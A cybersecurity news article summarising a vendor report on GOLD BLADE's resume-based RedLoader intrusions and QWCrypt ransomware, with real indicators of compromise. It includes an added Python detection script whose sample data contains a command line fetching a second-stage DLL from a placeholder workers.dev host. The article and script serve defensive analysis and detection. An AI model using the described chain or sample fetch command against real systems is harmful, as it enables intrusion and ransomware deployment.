GOLD BLADE Exploiting Custom QWCrypt Locker for Data Exfiltration and Ransomware Deployment
Once known for espionage operations, GOLD BLADE has evolved into a hybrid actor that combines data theft, credential harvesting, and selective ransomware deployment using its proprietary QWCrypt locker.
Nearly 80% of the campaign’s targets were Canada-based organizations, primarily in the services, manufacturing, retail, and technology sectors.
The group has shifted from classic spearphishing to a novel social engineering tactic that exploits recruitment platforms such as Indeed, JazzHR, and ADP WorkforceNow.
Instead of sending malicious emails, attackers upload weaponized resumes as PDFs directly to recruitment portals, exploiting HR departments’ trust in these systems.
Upon viewing the documents, victims are redirected to fake “Safe Resume Share Service” pages that serve RedLoader malware, initiating a multi-stage compromise.
The RedLoader infection chain observed by Sophos evolved through three stages: initial execution, secondary payload deployment, and final installation.
Early variants relied on .lnk and .iso files for delivery, while later attacks in 2025 added remote DLL sideloading, with the payloads hosted on Cloudflare Workers domains (e.g., automatinghrservices[.]workers[.]dev).
Each stage used browser-themed scheduled tasks to deploy payloads and maintain persistence, utilizing living-off-the-land binaries such as pcalua.exe for stealth execution.
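As an added illustration, not code from the Sophos report or this article, the small triage pass below turns the behaviours described above (browser-themed scheduled tasks, pcalua.exe used as a proxy launcher, payloads fetched from workers.dev hosts) into rules and runs them over constructed process-creation and task-creation records; every path, task name and hostname in the sample data is an assumed placeholder.

```python
import re

# Rules derived from the behaviours described above. The hostnames, paths and
# task names in SAMPLE_EVENTS are constructed for this example, not observed IoCs.
WORKERS_DEV = re.compile(r"[\w.-]+\.workers\.dev", re.IGNORECASE)
BROWSER_THEMED = re.compile(r"chrome|edge|firefox|brave|opera", re.IGNORECASE)
PCALUA = re.compile(r"\bpcalua\.exe\b", re.IGNORECASE)

def check_process(ev):
    """Rules for a process-creation record (image, parent image, command line)."""
    hits = []
    image, parent, cmd = ev["image"], ev.get("parent", ""), ev.get("cmdline", "")
    if PCALUA.search(image) and re.search(r"\s-a\s", cmd):
        hits.append("pcalua.exe used as a proxy launcher (-a)")
    if PCALUA.search(parent):
        hits.append("process spawned by pcalua.exe")
    if WORKERS_DEV.search(cmd):
        hits.append("command line references a workers.dev host")
    return hits

def check_task(ev):
    """Rules for a scheduled-task-creation record (task name, action command)."""
    hits = []
    if BROWSER_THEMED.search(ev["task"]) and PCALUA.search(ev["action"]):
        hits.append("browser-themed scheduled task runs pcalua.exe")
    if WORKERS_DEV.search(ev["action"]):
        hits.append("scheduled task action references a workers.dev host")
    return hits

def triage(events):
    """Return (event id, finding) pairs for every rule that fires."""
    findings = []
    for ev in events:
        hits = check_task(ev) if ev["kind"] == "task" else check_process(ev)
        findings.extend((ev["id"], h) for h in hits)
    return findings

SAMPLE_EVENTS = [  # constructed sample data
    {"id": 1, "kind": "task", "task": r"\Microsoft\Windows\ChromeUpdateCheck",
     "action": r"C:\Windows\System32\pcalua.exe -a C:\Users\hr\AppData\Roaming\update\loader.exe"},
    {"id": 2, "kind": "process", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\pcalua.exe",
     "cmdline": r"C:\Windows\System32\pcalua.exe -a C:\Users\hr\AppData\Roaming\update\loader.exe"},
    {"id": 3, "kind": "process", "parent": r"C:\Windows\System32\pcalua.exe",
     "image": r"C:\Users\hr\AppData\Roaming\update\loader.exe",
     "cmdline": r"loader.exe https://example-hr-portal.workers.dev/stage2.dll"},
    {"id": 4, "kind": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r"chrome.exe --profile-directory=Default"},
]

if __name__ == "__main__":
    for event_id, finding in triage(SAMPLE_EVENTS):
        print(f"event {event_id}: {finding}")
```

A legitimate browser launch (event 4) produces no finding, while the task, the proxy launch and the child fetching from a workers.dev host each do.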
To maintain command and control, GOLD BLADE leveraged open-source RPivot and Chisel tunneling tools, establishing SOCKS proxies to C2 servers hosted on Cloudflare Workers and external IP infrastructure.
Defense evasion employed a Bring Your Own Vulnerable Driver (BYOVD) technique, using modified Zemana AntiMalware drivers and customized Terminator utilities to disable EDR/XDR protections.
Analysts discovered unique build paths in Terminator samples, revealing an organized ransomware toolkit and operational structure.
In April and July 2025, GOLD BLADE deployed QWCrypt ransomware after exfiltrating data. Delivered in encrypted 7-Zip archives, the ransomware appended a .qwCrypt extension to encrypted files and dropped ransom notes styled after those of LockBit.
While Sophos CryptoGuard blocked many of the encryption attempts, encryption on unprotected endpoints was limited.
The incident demonstrated GOLD BLADE’s strategic ability to alternate between espionage-for-hire and direct financial extortion.
Sophos detections for this campaign include Troj/Agent-BLEI, Troj/Ransom-HHH, and CXmal/KillAV-ZA.
Key indicators include multiple Cloudflare Workers C2 domains, IP 109[.]206[.]236[.]209, and confirmed QWCrypt hashes such as 568352411deff640ba781ae55d98d657da02191d97e0466e6883b966dd1e77db.
Organizations are advised to sandbox incoming resumes, strengthen endpoint monitoring, and deploy managed detection and response (MDR) solutions to detect evolving GOLD BLADE techniques.
The post GOLD BLADE Exploiting Custom QWCrypt Locker for Data Exfiltration and Ransomware Deployment appeared first on Cyber Security News.